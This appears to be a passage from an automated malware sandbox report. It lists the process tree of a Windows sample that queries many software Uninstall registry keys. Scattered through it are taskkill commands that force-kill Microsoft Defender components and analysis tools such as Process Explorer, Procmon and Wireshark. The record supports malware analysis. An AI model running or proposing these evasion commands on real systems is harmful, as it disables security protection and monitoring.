    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:1264
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:1572
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:328
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:1964
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
    3⤵
    PID:1732
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1912
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:292
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1772
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1628
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:368
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1764
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1132
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1472
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1980
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1384
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:328
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1852
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1772
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1212
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:680
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1136
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1388
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1960
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1884
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1984
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1844
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1264
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1376
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1904
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1404
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1408
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1984
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
    3⤵
    PID:1080
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:1784
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1376
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:1980
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1912
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:1404
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
    3⤵
    PID:1948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1080
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1132
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1864
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1376
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
    3⤵
    PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1408
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1404
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:1472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:1852
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:1824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:1884
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:1980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:1864
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:1824
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:1404
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:1864
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:1472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:368
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1404
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:1960
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
    3⤵
    PID:1948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1472
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
    3⤵
    PID:1948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1824
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
    3⤵
    PID:1824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
    3⤵
    PID:2056
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2068
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:2080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:2092
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2104
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:2116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:2128
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2140
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:2152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:2164
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2176
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2228
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2276
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:2348
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2396
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2460
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2508
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2556
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2604